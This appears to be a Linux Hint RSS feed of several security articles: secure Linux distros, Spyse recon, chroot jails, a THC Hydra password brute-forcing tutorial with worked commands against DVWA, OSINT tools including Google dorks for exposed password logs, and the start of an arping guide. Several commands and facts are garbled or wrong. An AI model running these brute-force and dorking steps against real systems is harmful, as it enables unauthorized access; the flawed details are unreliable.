Security – Linux Hint https://linuxhint.com Exploring and Master Linux Ecosystem Fri, 05 Mar 2021 03:36:08 +0000 en-US hourly 1 https://wordpress.org/?v=5.6.2 Top 10 Most Secure Linux Distros for Personal Use https://linuxhint.com/most-secure-linux-distros-personal-use/ Fri, 05 Mar 2021 03:35:03 +0000 https://linuxhint.com/?p=92680 It is no secret that everyone looks for a secure operating system that offers top-notch privacy. If you are using a system that is not secure enough, anyone can access your system and exploit your data, such as photos, videos, files, and sensitive financial information. Linux systems offer fantastic privacy and security as compared to other OS, like Windows or Mac. So, it is best to go for a Linux system for better security. But, there is an extensive list of secure Linux distros, and it can be difficult to choose one.

Several different kinds of secure Linux distros exist, and each is developed for unique usages, including spy-level security, personal use, organizational usage, and more. So, if you want standard security and privacy, you can use the Linux distros that are best for personal use. This article will help you to choose the best Linux distro for your personal usage needs. The following sections include complete information about the top 10 most secure Linux distros available for personal use.

Linux Kodachi

Linux Kodachi is a lightweight Linux distro based on Xubuntu 18.04 and developed for running from a USB or DVD. Kodachi is one of the most secure Linux distros available for personal use, offering an anonymous, anti-forensic, and secure system to users. For even tighter security, Linux Kodachi filters all network traffic by VPN, or Virtual Proxy Network, and a Tor network to obscure your location. This Linux distro also works to remove all activity traces after you use it. Kodachi is based on the stable distribution Linux Debian, with customized features from Xfce for higher stability, security, and singularity.

Kodachi also has a support system for a protocol, DNScrypt, and utility for encrypting a request for the OpenDNS server through elliptical cryptography. As mentioned previously, Kodachi also has a browser-based system on the Tor Browser, in which you can eliminate any uncertain Tor modules.

Pros and cons of Linux Kodachi

Pros Cons
Contains various pre-installed programs. Many users complain about the narrow service, as Kodachi is based on Xubuntu.
Offers a powerful security system.
Provides speedy network access.
Is highly stable.

2. Qubes OS

Qubes OS is one of the most secure Linux distros available. Many users recommend this distro for a high-level privacy system. Qubes is a security-oriented operating system (OS) that offers the compatibility to run other programs on a computer/laptop. This Linux distro works for isolating the user’s files from malicious activities and malware without affecting the data. Qubes OS provides top-notch security through compartmentalization, through which you can compartmentalize different tasks in the securely isolated compartment known as Qubes.

The Qubes operating system uses the RPM package manager to work on any desktop environment without consuming an excessive amount of resources. Most importantly, Qubes is an open-source operating system, so the source codes are easily available online. We recommend that you use Qube OS if you need advanced security, but it is a bit of an advanced operating system for new users.

Pros and Cons of Qubes OS

Pros Cons
Users can perform application separation with a sandboxed virtual machine, assuring that any malicious script or apps cannot be passed to system applications. Only recommended for advanced users.
Offers a higher level of separation through the Internet by forcing all Internet traffic via the Whonix Tor gateway. It is difficult to test Qubes OS because it does not work well in a virtual machine.

3. Whonix

Whonix is based on the Debian GNU/Linux to offer outstanding security and advanced level privacy. This distro is one of the most secure Linux distros if you want something different in your system’s security. Whonix is different because it does not have a live system rather than running on a virtual machine, particularly where it is isolated from the primary operating system to eliminate the DNS leakage risk.

There are two specific parts to Whonix. The first part is Whonix Gateway, which works as the Tor gateway. The second part is Whonix Workstation, an isolated network that works to route all connections via the Tor gateway. This Linux distro will work well if you need a private IP address for your system. As mentioned earlier, Whonix is based on Debian, so it utilizes two different VMs (virtual machines) that make it a little bit resource hungry.

Pros and Cons of Whonix

Pros Cons
Uses VirtualBox technology to ensure that many people can use this distro easily. Is somewhat resource hungry because it requires a high-end system for proper use.
Is easy to set up and use because it does not require special knowledge. Anonymity in Whonix is offered in the workstation virtual machine only, and users can forget it easily.

4. Tails (The Amnesic Incognito Live System)

Tails, or The Amnesic Incognito Live System, is a security-centric system based on Debian. It is one of the most secure Linux distros available for personal use because it was designed for protecting your identity by keeping your activities anonymous. Tails forces incoming or outgoing traffic through a Tor network and block all traceable connections. Tails was first released in 2009 for personal computers.

Tails is one of the most secure Linux distros available for personal use. It does not require any space in your hard disk, as Tails only needs space in the RAM, but it will be erased once a user shuts down the system. Hence, the default desktop environment of Tails is Gnome, and it can be used via a pen drive to save all the RAM data.

Pros and Cons of Tails

Pros Cons
Is an easy-to-use Linux distro. Must be used as the live boot OS.
You can quickly start browsing anonymously. Sometimes, users misplace the flash drive, which can create major issues.
Is packaged with a TOR Browser. TOR is a bit problematic, as it is compressed for Tails.
Offers a secured space to save passwords.

5. Kali Linux

Kali Linux is based on Debian and was created to offer an amazing penetration Linux distro for ethical hacking, security experts, digital forensics, and network security assessments. This distribution is one of the best and most secure Linux distros for personal, providing users with packages of tools like Foremost, Wireshark, Maltigo as-Aircrack-ng, Kismet, and more. These packages offer various benefits to users, such as exploiting a victim application, checking the targeted IP address, and performing a network discovery.

You can use Kali Linux via a USB stick or DVD, so this distro is quite easy to use, like the Tails distro mentioned earlier in the list. Kali Linux is compatible with both 32- and 64-bit systems. Apart from that, the basic requirements of Kali Linux are 512 MB of RAM and 10 GB of hard disk space. According to multiple surveys, developers consider Kali Linux to be one of the top-ranked and most secure Linux distros available.

Pros and Cons Kali Linux

Pros Cons
An open-source distribution that can be accessed easily. Can make the system a bit slower than usual.
Inxluswa multi-language support. Users face software-related issues.
Allows users to locate different binaries easily. Sometimes, Kali Linux corrupts the system.

6. Parrot Security OS

Parrot Security OS was developed by FrozenBox and is based on a Debian distribution. Released in 2013, this Linux distro was created for ethical hacking, working anonymously, and penetration testing. This Linux distro was specifically designed to test authorized simulated attacks on the computer system, which can be beneficial for assessing system vulnerabilities. As mentioned earlier, Parrot Security OS is an open-source and free GNU distribution made for security researchers, developers, penetration testers, privacy enthusiasts, and forensic investigators.

Parrot Security OS comes with a portable laboratory that works to protect your system from security-related issues while using the Internet, gaming, or browsing. This Linux distro is distributed as a rolling release (frequently providing updates and applications), so it offers some core applications, including Parrot Terminal, MATE, Tor Browser, and OnionShare, as its default desktop environment.

Pros and Cons Parrot Security OS

Pros Cons
Offers a large number of tools. It is not minimalistic.
The widgets are very easy to use. It has shortcut-related issues.
Does not require the GPU to run correctly.
Has a sleek UI, and things are easy to navigate.

7. BlackArch Linux

BlackArch is based on Arch Linux, and it is a lightweight Linux distro designed for penetration tester, security researchers, and computer experts. This Linux distro provides multiple features, combined with 2,000+ cybersecurity tools that users can install according to their requirements. BlackArch can be used on any hardware, as it is a lightweight Linux distro and also a new project, so many developers prefer to use this distro nowadays.

According to the reviews, this Linux distro can compete against many reliable OS due to the variety of features and tools for experts that it offers. Users can choose between different desktop environments, including Awesome, spectrwm, Fluxbox, and Blackbox. BlackArch is available in the DVD image, and you can also easily run it from a pen drive.

Pros and Cons of BlackArch Linux

Pros Cons
Offers a large repository. It is not recommended for beginners.
It is a suitable choice for professionals. Sometimes, the system becomes slower while using BlackArch.
It is better than ArchStrike.
It is based on Arch Linux.

8. IprediaOS

IprediaOS is a privacy-centered Linux distro based on Fedora. If you are looking for a platform to browse, email, and share files anonymously, then IprediaOS is a good choice for you. Along with privacy and anonymity, IprediaOS also provides stability, computing ability, and amazing speed. Compared to other Linux distros, IprediaOS is much faster, and you can run this distro smoothly even on older systems.

The Ipredia operating system is security-conscious, and it is designed with the minimalist ideology of shipping with vital applications. IprediaOS seeks to transparently encrypt and anonymize all traffic by sending it through an I2P anonymizing network. The basic features of IprediaOS include I2P Router, Anonymous BitTorrent client, Anonymous email client, Anonymous IRC client, and more.

Pros and Cons of IprediaOS

Pros Cons
Can be used on an older system. Sometimes, users face performance-related issues.
Provides anonymous email client services.
Provides anonymous email client services.

9. Discreete

Discreete Linux is based on Debian, and it was developed to offer protection from trojan-based surveillance by isolating working from a location with secured data. Discreete was formerly known as UPR (Ubuntu Privacy Remix), so it is a trusted and secure Linux distro that will protect your data. You can use this OS via CD, DVD, or USB drive, as it cannot be installed on the hard drive, and all networks are deliberately disabled when Discreete runs in the system.

Discreete is one of the unique Linux distros in terms of security, and it was developed for everyday computer activities, such as gaming or word processing. As we have mentioned above, Discreete disables the Internet connection while working to separate the data and cryptographic keys to remain protected from non-trusted networks.

Pros and Cons of Discreete

Pros Cons
It is best for everyday work. Disables the network when a user works on it.
You can use it via DVD, CD, or USB drive.

10. TENS

The full form of TENS is Trusted End Node Security. TENS was developed by the United States Department of Defense’s Air Force Research Laboratory. This Linux distro does not need administrator privileges for running without installation and storing it in the hard drive. TENS consists of an Xfce desktop, and it is customized to look like a Windows XP desktop. Everything about the appearance of TENS is similar to Windows, including the application names and placements.

This Linux distro is available in two editions. The first edition of TENS is a Deluxe edition that includes various applications, like LibreOffice, Evince PDF reader, Totem Movie Player, Thunderbird, and so on. The other edition of TENS is the regular edition that includes an encryption app and some other useful apps.

Pros and Cons of TENS

Pros Cons
Offers great security and privacy. The look of TENS
Provides two different editions for users. Exhibits performance-related issues.

Conclusion

This article provided a list of the top ten most secure Linux distros for personal use. All the distros discussed in this article offer amazing features and anonymity to the user. We have included these Linux distros according to user reviews and features, but the list position of each distribution is completely random. Privacy, security, and anonymity are important for performing specific computer-related tasks, and any of these Linux distros would be a great choice for keeping your information safe from malicious threats.

]]>
How to recon Domains and IPs with Spyse toolset https://linuxhint.com/recon-domains-ips-spyse-toolset/ Mon, 01 Feb 2021 13:11:01 +0000 https://linuxhint.com/?p=88589 Reconnaissance, shortly termed as recon, refers to the set of related activities and techniques to gather the information of a target system. For instance, various techniques are used to perform reconnaissance like Footprinting scanning, etc. Reconnaissance lies in the category of ethical hacking and can be performed by a specialized person. There are many cybersecurity software tools out there that help us to perform the reconnaissance, but few are nearly as good as Spyse.

Spyse takes a very out-of-the-box route when it comes to online security, and for this reason, it has found a following among cybersecurity enthusiasts. It can be used in the service of a search engine; it can collect large swathes of data off the web. This translates into a compelling quality. This tool has its database, which is the biggest cybersecurity database on the internet. You can get your hands on some seriously heavy-duty reconnaissance data with the Spyse database.

This post describes how to recon domains and IPs with the Spyse toolset.

Getting started with Spyse

Spyse has a web-browser interface. It doesn’t have any installable package. I will show you how to access the Spyse toolset. On your browser window, open a new tab and type spyse.com. Next, click the signup button.


Now enter the details; you have two options, you can make an individual account, or you can link your company account. I have made an individual account.


A verification/confirmation mail will be sent to your account. Go to your mail account and approve the link given. You will be awarded a guest account with limited functionalities. You can purchase the tool on subscription-based packages. A Standard package, Professional package, and Business package can be bought on each account.

Spyse suite tools:

There are many tools associated with Spyse. All of these tools have a specific advantage in reconnaissance of the internet. The tools are mentioned below:

  • API
  • Advanced Search
  • Bulk Search
  • Subdomain Finder
  • Port Scanner
  • ASN Lookup
  • Domain Lookup
  • IP Lookup
  • Reverse IP Lookup
  • DNS Lookup
  • NS Lookup
  • MX Lookup
  • Reverse DNS Lookup
  • SSL Lookup
  • WHOIS Lookup
  • Company Lookup
  • Reverse Adsense Lookup
  • CVE Search
  • Technology Checker


Now I will show you how to use some of these tools. I have used three domain names and one server IP for testing. I have attached screenshots that define the visual usage of the Spyse toolset.

Recon Domain with Spyse

To recon a domain with Spyse, on the dashboard screen, select the ‘Domain’ option from the given list and enter the domain in the search box.


Next, click on the ‘Search’ and Spyse will display all the related domain information. First, a General information section will be displayed. Additionally, Spyse displays the DNS record, DNS History, Technologies information, etc.

Recon IP with Spyse

Similarly to recon IP with Spyse, select the ‘IP’ option from the given list and enter the domain in the search box on the dashboard screen.


Click on the search button, and Spyse will display all the related information.

Advanced Search with Spyse

With the Spyse Advanced Search, you can collect data live while you’re browsing through sections of the database. Five search parameters can be added to each keyword that you enter in the advanced search option to yield results otherwise unavailable. Let’s say you were looking for port users. With advanced search, you can retrieve complementary information such as the open ports, CVEs, programs, the operating system in use, and other information related to the company.

For instance, I have to search the domains that contain ‘linux’ in the title. For that purpose, click on ‘Domain’ and add a filter for title.


Now, click on search and Spyse will retrieve all the results from its database.

Wrapping up

Reconnaissance is performed to gather data about a website. When it comes to Cybersecurity, Spyse has knocked it right out of the park. This post explicates how to use the interface of Spyse with examples. The examples include domain search, IP search, and advanced search. ]]> How To Setup Linux Chroot Jails https://linuxhint.com/setup-linux-chroot-jails/ Sun, 27 Dec 2020 13:38:16 +0000 https://linuxhint.com/?p=83156 Especially those dedicated to critical services, Linux systems require expert-level knowledge to work with and core security measures.

Unfortunately, even after taking crucial security measures, security vulnerabilities still find their way into secure systems. One way to manage and protect your system is by limiting the damage possible once an attack occurs.

In this tutorial, we’ll discuss the process of using chroot jail to manage system damages in the event of an attack. We’ll look at how to isolate processes and subprocesses to a particular environment with false root privileges. Doing this will limit the process to a specific directory and deny access to other system areas.

A Brief Introduction To chroot jail

A chroot jail is a method of isolating processes and their subprocess from the main system using false root privileges.

As mentioned, isolating a particular process using fake root privileges limits damages in the case of a malicious attack. Chrooted services are limited to the directories and files within their directories and are non-persistent upon service restart.

Why use chroot jail

The main purpose of chroot jail is as a security measure. Chroot is also useful when recovering lost passwords by mounting devices from live media.

There are various advantages and disadvantages of setting chroot jail. These include:

Advantages

  • Limits access: In case of security compromise, the only damaged only directories are those within the chroot jail.
  • Command limits: Users or processes get limited to commands allowed in the jail.

Disadvantages

  • It can be challenging to setup.
  • It requires a lot of work—If you need an extra command than the ones allowed by default, you have to include it manually.

How to Create a Basic Chroot Jail

In this process, we will create a basic chroot jail with 3 commands limited to that folder. This will help illustrate how to create a jail and assigning various commands.

Start by creating a main folder. You can think of this folder as the / folder in the main system. The name of the folder can be anything. In our case, we call it /chrootjail

sudo mkdir /chrootjail

We will use this directory as the fake root containing the commands we will assign to it. With the commands we’ll use, we will require the bin directory (contains the command executables) and the, etc., directory (containing configuration files for the commands).

Inside the /chrootjail folder, create these two folders:

sudo mkdir /chrootjail/{etc,bin}

The next step is to create directories for dynamically linked libraries for the commands we want to include in the jail. For this example, we will use bash, ls, and grep commands.

Use the ldd command to list the dependencies of these commands, as shown below:

sudo ldd /bin/bash /bin/ls /bin/grep

If you are not inside the bin folder, you need to pass the full path for the commands you wish to use. For example, ldd /bin/bash or ldd /bin/grep

From the ldd output above, we need the lib64 and /lib/x86_64-linux-gnu directories. Inside the jail directory, create these folders.

sudo mkdir -p /chrootjail{lib/x86_64-linux-gnu, lib64}

Once we have the dynamic library directories created, we can list them using a tree, as shown below:

As we progress, you will start to get a clear image of what a chroot jail means.

We are creating an environment similar to a normal root directory of a Linux system. The difference is, inside this environment, only specific commands are allowed, and access is limited.

Now that we’ve created the bin. etc., lib, and lib64, we can add the required files inside their respective directories.

Let us start with the binaries.

sudo cp /bin/bash /chrootjail/bin && sudo cp /bin/ls /chrootjail/bin && sudo cp /bin/grep /chrootjail/bin

Having copied the binaries for the commands we need, we require the libraries for each command. You can use the ldd command to view the files to copy.

Let us start with bash. For bash, we require the following libraries:

/lib/x86_64-linux-gnu/libtinfo.so.6
/lib/x86_64-linux-gnu/libdl.so.2
/lib/x86_64-linux-gnu/libc.so.6
/lib64/ld-linux-x86-64.so.2

Instead of copying all these files one by one, we can use a simple for loop to copy each library in all the libraries to /chrootjail/lib/x86_64-linux-gnu

Let us repeat this process for both ls and grep command:

For ls command:

For grep command:

Next, inside the lib64 directory, we have one shared library across all the binaries. We can simply copy it using a simple cp command:

Next, let us edit the main bash login file (located in /etc/bash.bashrc in Debian) so that we can tweak the bash prompt to our liking. Using a simple echo and tee commands as shown:

sudo echo 'PS1="CHROOTJAIL #"' | sudo tee /chrootjail/etc/bash.bashrc

Once we have completed all the steps above, we can log in to the jail environment using the chroot command as shown.

sudo chroot /chrootjail /bin/bash

You will get root privileges with the prompt similar to those created in the echo and tee command above.

Once you log in, you will see that you only have access to the commands you included when you created the jail. If you require more commands, you have to add them manually.

NOTE: Since you have included the bash shell, you will have access to all the bash built-in commands. That allows you to exit the jail using the exit command.

Conclusion

This tutorial covered what chroot jail is and how we can use it to create an isolated environment from the main system. You can use the techniques discussed in the guide can to create isolated environments for critical services.

To practice what you’ve learned, try to create an apache2 jail.

HINT: Start by creating a root directory, add the config files (etc/apache2), add the document root (/var/www/html), add the binary (/usr/sbin/apache2) and finally add the required libraries (ldd /usr/sbin/apache2) ]]> How to install and use THC Hydra? https://linuxhint.com/how-to-install-and-use-thc-hydra/ Sun, 13 Dec 2020 12:40:45 +0000 https://linuxhint.com/?p=80906 Passwords are the weakest links. If someone gets ahold of your password, it’s game over! As such, passwords are the most important security weaknesses. There are many tools that allow you to attempt username:password combinations throughout, however, none of them are as potent as THC Hydra. This is because it’s both rapid and offers a large number of protocols to brute force. In fact, it can deal with about 55 different protocols. Moreover, there are two versions of THC Hydra: a GUI version and a CLI version.

Installing THC Hydra

Download THC hydra from https://github.com/vanhauser-thc/thc-hydra.

Once downloaded, extract the files, and execute the following:

cd thc-hydra-master/
./configure
make
make install

If you’re using Ubuntu/Debian, type the following as well:

apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
                libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
                firebird-dev libmemcached-dev libgpg-error-dev \
                libgcrypt11-dev libgcrypt20-dev

CLI Usage

Here, we examine how to use hydra with common protocols.

SSH/FTP/RDP/TELNET/MYSQL

One must remember that Hydra can deal with approximately 55 different protocols. These are but a few examples of the most dealt-with protocols, such as ssh, ftp, rdp, telnet, and mysql. However, the same principle applies to the remaining protocols.

In order to get Hydra to work with a protocol, you’ll need either a username (-l) or a list of usernames (-L), a list of passwords (a password file), and the target IP address associated with the protocol. You can add further parameters if you wish. For example, -V for verbosity.

hydra -l <username> -P <password> <protocol>://<ip>

Alternatively, you can also format it as follows:

hydra -l <username> -P <password file> -s <port> -V <ip> <protocol>

-l or -L: username or list of usernames to attempt
-P: password list
-s: port
-V: verbose
<protocol>: ftp/rdp/ssh/telnet/mysql/etc…
<ip>: ip address

For example, for FTP:

hydra -V -f -l <username> -P <password> ftp://&lt;ip>

Or

hydra -l <username> -P <password file> -s 21 -V &lt;ip> ftp

HTTP-GET-FORM

Depending on the type of request, GET or POST, you can use either http-get-form or http-post-form. Under the inspect element, you can figure out whether the page is a GET or POST. You can then use the http-get-form when attempting to find the password to a username:password combination on the web (for instance, a website).

hydra -l <username> -P <password> -V -f <ip> http-get-form “a:b:c:d”

-l or -L: username or list of usernames to attempt
-P: password list
-f : stop when the password is found
-V: verbose
a: login page
b: username/password combination
c: error message received if login fails
d: H=session cookie

For example, suppose we wish to hack DVWA (Damn Vulnerable Web Application). Once online using apache2, it should be at your local IP. In my case, it’s at http://10.0.2.15.

So, the:
<ip>: 10.0.2.15
a: /vulnerabilities/brute/

Next, we need b and c. So, let’s try to login with fake credentials (anything here will do). The site displays this message: “Username or password incorrect.” Therefore, we will use the message c:

c: username or password incorrect

So, b will be as follows:

b: username=^USER^&password=^PASS^&Login=Login#

Replace the credentials inputted with ^USER^ and ^PASS^. If this was a POST request, you would find this information under the inspect element > Request tab.

Next, under inspect element, copy the cookie. This will be d:

d: H=Cookie:PHPSESSID=3046g4jmq4i504ai0gnvsv0ri2;security=low

So, for example:

hydra -l admin -P /home/kalyani/rockyou.txt -V -f 10.0.2.15 http-get-form<br /><span style="color: #0000ff" data-darkreader-inline>/vulnerabilities/</span>brute/:username=^USER^&password=^PASS^&Login=Login<br />#:username or password incorrect:<br /> H=Cookie:PHPSESSID=3046g4jmq4i504ai0gnvsv0ri2;security=low”

When you run this, and if the password is in the list, then it will find it for you.

However, if this proves to be too much work for you, no need to stress out because there’s a GUI version as well. It is a lot simpler than the CLI version. The GUI version of THC hydra is called Hydra GTK.

Installing Hydra GTK

In Ubuntu, you can simply install Hydra GTK using the following command:

sudo apt-get install hydra-gtk -y

Once installed, you will need the following:

  1. A target or list of targets: This is the IP address of the protocol you wish to attack
  2. Port number: the port number associated with the protocol
  3. Protocol: ssh, ftp, mysql, etc…
  4. Username: either input a username or a list of usernames
  5. Password or Password list

Depending on whether you want to hack one or multiple targets, you can either input one or many targets into the target box. Suppose you’re attacking a single target, an SSH, located at 999.999.999.999 (a fake IP address, obviously). In the target box, you’d put 999.999.999.999, and in the port section, you’d put 22. Under the protocol, you’d put SSH. It would be advisable to tick the “be verbose” and the “show attempts” boxes as well. The “be verbose” box is equivalent to -v in THC Hydra, while the “show attempts” box is equivalent to -V in THC Hydra. The plus point about Hydra is that it can deal with a large number of protocols.

In the next tab, input the username you desire or a list of usernames (the location of the list of usernames in this case). For instance, in the “username list”, I would put “/home/kalyani/usernamelist.txt”. The same is true for passwords. The location of the password file is inputted in the box called “password list”. Once these have been filled in, the rest is easy. You can leave the tuning and specific tabs as is and click on the start button under the start tab.

Hydra GTK is a lot easier to use than THC Hydra, even though they are the same thing. Whether you use THC Hydra or Hydra GTK, both are great tools to crack passwords. The problem typically encountered will come in the form of the password list used. You can obviously use other programs such as crunch and wordlist generators to tailor your password list to your liking. However, if you can also tailor the password list to your use, Hydra can become a very powerful ally.

Happy Hacking!

]]>
OSINT Tools and Techniques https://linuxhint.com/osint-tools-and-techniques/ Tue, 24 Nov 2020 13:31:56 +0000 https://linuxhint.com/?p=78024 OSINT, or Open Source Intelligence, is the act of gathering data from distributed and freely accessible sources. OSINT tools are used to gather and correspond data from the Web. Data is accessible in different structures, including text design, documents, images, etc. The analysis and collection of information from the Internet or other publicly available sources is known as OSINT or Open Source Intelligence. This is a technique used by intelligence and security companies to gather information. This article provides a look at some of the most useful OSINT tools and techniques.

Maltego

Maltego was created by Paterva and is utilized by law enforcement, security experts, and social engineers for gathering and dissecting open-source information. It can gather large amounts of information from various sources and utilize different techniques to produce graphical, easy-to-see outcomes. Maltego provides a transformation library for the exploration of open-source data and represents that data in a graphical format that is suitable for relation analysis and data mining. These changes are inbuilt and can likewise be altered, dependent on necessity.

Maltego is written in Java and works with every operating system. It comes pre-installed in Kali Linux. Maltego is widely used because of its pleasant and easy-to-understand entity-relationship model that represents all the relevant details. The key purpose of this application is to investigate real-world relationships between people, web pages or domains of organizations, networks, and internet infrastructure. The application may also focus on the connection between social media accounts, open-source intelligence APIs, self-hosted Private Data, and Computer Networks Nodes. With integrations from different data partners, Maltego expands its data reach to an incredible extent.

Recon-ng

Recon-ng is a surveillance tool that is identical to Metasploit. If recon-ng is being operated from the command line, you will enter an environment, such as a shell, in which you can configure options and reconfigure and output reports for different report forms. A variety of helpful features are offered by the virtual console of Recon-ng, such as command completion and contextual support. If you want to hack something, use Metasploit. If you want to gather public information, use the Social Engineering Toolkit and Recon-ng to carry out surveillance.

Recon-ng is written in Python, and its independent modules, key list, and other modules are mainly used for data collection. This tool is preloaded with several modules that use online search engines, plugins, and APIs that can assist in collecting the target information. Recon-ng, like cutting and pasting, automates time-consuming OSINT processes. Recon-ng does not suggest that its tools can carry out all OSINT collection, but it can be used to automate many of the more common forms of harvesting, allowing more time for the stuff that still needs to be done manually.

Use the following command to install recon-ng:

ubuntu@ubuntu:~$    sudo apt install recon-ng
ubuntu@ubuntu:~$    recon-ng

To list the available commands, use the help command:

Suppose we need to gather some subdomains of a target. We will use a module named “hacker target” to do so.

[recon-ng][default] > load hackertarget
[recon-ng][default][hackertarget] > show options
[recon-ng][default][hackertarget] > set source google.com

Now, the program will gather related information and show all the subdomains of the target set.

Shodan

To find anything on the Internet, especially the Internet of Things (IoT), the optimum search engine is Shodan. While Google and other search engines index search only the Internet, Shodan indexes almost everything, including webcams, water supplies to private jets, medical equipment, traffic lights, power plants, license plate readers, smart TVs, air conditioners, and anything you may think of that is wired into the internet. The greatest benefit of Shodan lies in helping defenders to locate vulnerable machines on their own networks. Let us look at some examples:

  • To find Apache servers in Hawaii:
    apache city:”Hawaii”
  • To find Cisco devices on a given subnet:
    cisco net:”214.223.147.0/24”

You can find things like webcams, default passwords, routers, traffic lights, and more with simple searches, as it is simpler, clearer, and easier to use.

Google Dorks

Google hacking, or Google dorking, is a hacking tactic that utilizes Google Search and other Google apps to identify security flaws in a website’s configuration and machine code. “Google hacking” involves using specialized Google search engine operators to find unique text strings inside search results.
Let us explore some examples using Google Dork to locate private information on the Internet. There is a way of identifying .LOG files that are unintentionally exposed on the internet. A .LOG file contains clues on what system passwords could be or the different system user or admin accounts that could exist. Upon typing the following command in your Google search box, you will find a list of products with exposed .LOG files before the year 2017:

allintext:password filetype:log before:2017

The following search query will find all the web pages that contain the specified text:

intitle:admbook intitle:Fversion filetype:php

Some other very powerful search operators include the following:

  • inurl: Searches for specified terms in the URL.
  • filetypes: Searches for specific file types, which can be any file type.
  • site: Limits the search to a single site

Spyse

Spyse is a cybersecurity search engine that can be used to quickly find internet assets and conduct external identification. The advantage of Spyse is partly due to its database methodology, which avoids the issue of long scanning times on queries for data collection. With several services operating at the same time, and reports that can take a very long time to return, cybersecurity specialists may know how inefficient scanning may be. This is the main reason why cybersecurity professionals are shifting towards this awesome search engine. The Spyse archive holds over seven billion important data documents that can be downloaded instantly. Using 50 highly functioning servers with data split into 250 shards, consumers can profit from the biggest scalable online database available.

In addition to supplying raw data, this cyberspace search engine also focuses on demonstrating the relationship between various areas of the Internet.

The Harvester

The Harvester is a Python-based utility. Using this program, you can obtain information from numerous public outlets, such as search engines, PGP key servers, and SHODAN device databases, such as addresses, sub-domains, administrators, employee names, port numbers, and flags. If you want to determine what an intruder can see in the company, this instrument is useful. This is the default Kali Linux tool, and you just have to upgrade The Harvester to use it. For installation, issue the following command:

ubuntu@ubuntu:~$ sudo apt-get theharvester

The basic syntax of The Harvester is as follows:

ubuntu@ubuntu:~$ theharvester -d [domainName] -b [searchEngineName / all][parameters]

Here, -d is the company name or the domain you want to search, and -b is the data source, such as LinkedIn, Twitter, etc. To search emails, use the following command:

ubuntu@ubuntu:~$ theharvester.py -d Microsoft.com -b all

The ability to search for virtual hosts is another fascinating feature of harvester. Through DNS resolution, the application validates whether several hostnames are connected with a certain IP address. This knowledge is very important because the reliability of that IP for a single host relies not just on its level of security but also on how safely the others hosted on the same IP are wired. In fact, if an attacker breaches one of them and gets access to the network server, then the attacker can easily enter every other host.

SpiderFoot

SpiderFoot is a platform used for capturing IPs, domains, email addresses, and other analysis objectives from multiple data outlets, including platforms such as “Shodan” and “Have I Been Pwned,” for Open Source Information and vulnerability detection. SpiderFoot can be used to simplify the OSINT compilation process of finding information about the target by automating the gathering process.

To automate this process, Spiderfoot searches over 100 sources of publicly available information and manages all classified intel from the various sites, email addresses, IP addresses, networking devices, and other sources. Simply specify the goal, pick the modules to run, and Spiderfoot will do the rest for you. For example, Spiderfoot can gather all the data necessary to create a complete profile on a subject you are studying. It is multiplatform, has a cool web interface, and supports almost 100+ modules. Install the Python modules specified below to install spiderFoot:

ubuntu@ubuntu:~$    sudo apt install pip
ubuntu@ubuntu:~$    pip install lxml netaddr M2Crypto cherrypy mako requests bs4

Creepy

Creepy is an open-sourced intelligence platform for Geolocation. Using various social networking sites and image hosting services, Creepy gathers information about location tracking. Creepy then displays the reports on the map with a search methodology based on the precise location and time. You can later view the files in depth by exporting them in CSV or KML format. Creepy’s source code is available on Github and is written in Python. You can install this awesome tool by visiting the official website:
http://www.geocreepy.com/

There are two main functionalities of Creepy, specified by two specific tabs in the interface: the “mapview” tab and the “targets” tab. This tool is very useful for security personnel. You can easily predict the behavior, routine, hobbies, and interests of your target using Creepy. A small piece of information that you know may not be of much importance, but when you see the complete picture, you can predict the next move of the target.

Jigsaw

Jigsaw is used to obtain knowledge about workers in a company. This platform performs well with large organizations, such as Google, Yahoo, LinkedIn, MSN, Microsoft, etc., where we can easily pick up one of their domain names (say, microsoft.com), and then compile all the emails from their staff in the various divisions of the given company. The only downside is that these requests are launched against the Jigsaw database hosted at jigsaw.com, so we depend solely on the knowledge inside their database that they allow us to explore. You can obtain information about major corporations, but you might be out of luck if you are investigating a less-famous startup company.

Nmap

Nmap, which stands for Network Mapper, is unarguably one of the most prominent and popular social engineering tools. Nmap builds on previous network monitoring tools to provide quick, comprehensive scans of network traffic.

To install nmap, use the following command:

ubuntu@ubuntu:~$ sudo apt install nmap

Nmap is available for all the operating systems and comes pre-equipped with Kali. Nmap operates by detecting the hosts and IPs running on a network using IP packets and then examining these packets to include details on the host and IP, as well as the operating systems they are running.

Nmap is used to scan small business networks, enterprise-scale networks, IoT devices and traffic, and connected devices. This would be the first program an attacker would use to attack your website or web application. Nmap is a free and open-source tool used on local and remote hosts for vulnerability analysis and network discovery.

The main features of Nmap include port detection (to make sure you know the potential utilities running on the specific port), Operating System detection, IP info detection (includes Mac addresses and device types), disabling DNS resolution, and host detection. Nmap identifies the active host through a ping scan, i.e., by using the command nmap -sp 192.100.1.1/24, which returns a list of active hosts and assigned IP addresses. The scope and abilities of Nmap are extremely large and varied. The following include some of the commands that can be used for a basic port scan:

For a basic scan, use the following command:

ubuntu@ubuntu:~$    nmap

For banner grabbing and service version detection scans, use the following command:

ubuntu@ubuntu:~$    nmap -sP -sC

For Operating System detection and aggressive scans, use the following command:

ubuntu@ubuntu:~$    nmap -A -O-

Conclusion

Open Source Intelligence is a useful technique that you can use to find out almost anything on the Web. Having knowledge of OSINT tools is a good thing, as it can have great implications for your professional work. There are some great projects that are using OSINT, such as finding lost people on the Internet. Out of numerous Intelligence sub-categories, Open Source is the most widely used because of its low cost and extremely valuable output.

]]>
How to Use arping Command in Linux https://linuxhint.com/use-arping-command-linux/ Tue, 24 Nov 2020 13:14:44 +0000 https://linuxhint.com/?p=78009 To a network administrator, the ARP protocol may sound familiar. ARP is a protocol that Layer 2 devices implement for discovering and communicating with each other. The arping tool works using this protocol.

Now, why would you need arping? Imagine you are working with a small office network. Using the classic ping command to ping hosts to verify their availability is very tempting, right? Well, if you are using the ICMP protocol, then you are actually performing ARP requests for probing devices in the network.

This is where the arping tool comes in. Like ping, arping pings network hosts using network layer ARP packets. This method is useful for hosts that do not respond to Layer 3 and Layer 4 ping requests.

This article shows you how to use arping command in Linux.

Arping in Linux

Among network admins, arping is a popular tool. However, it does not come included in the default set of tools offered by Linux. So, you will have to install arping manually.

Thankfully, arping is a popular tool. No matter what distro you are using, it should be available directly from the official package servers. Run the following command according to your distro.

For Debian/Ubuntu and derivatives, the net-tools package is necessary for the arp tool:

$ sudo apt install arping net-tools

For Fedora and derivatives:

$ sudo dnf install arping

For openSUSE and derivatives:

$ sudo zypper install arping2

Using arping

